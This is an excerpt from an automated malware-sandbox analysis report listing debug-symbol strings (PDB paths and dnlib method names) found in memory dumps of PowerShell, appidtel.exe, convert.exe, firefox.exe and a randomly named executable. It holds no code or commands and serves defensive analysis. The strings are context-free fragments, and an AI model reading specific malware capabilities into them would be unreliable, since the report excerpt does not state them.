Source: Binary string: wntdll.pdbUGP source: appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: convert.pdb source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: convert.pdbGCTL source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mNqSPruzCXM.exe, 00000011.00000000.2643006321.000000000026E000.00000002.00000001.01000000.00000006.sdmp, mNqSPruzCXM.exe, 00000018.00000000.2801120472.000000000026E000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: appidtel.pdbGCTL source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
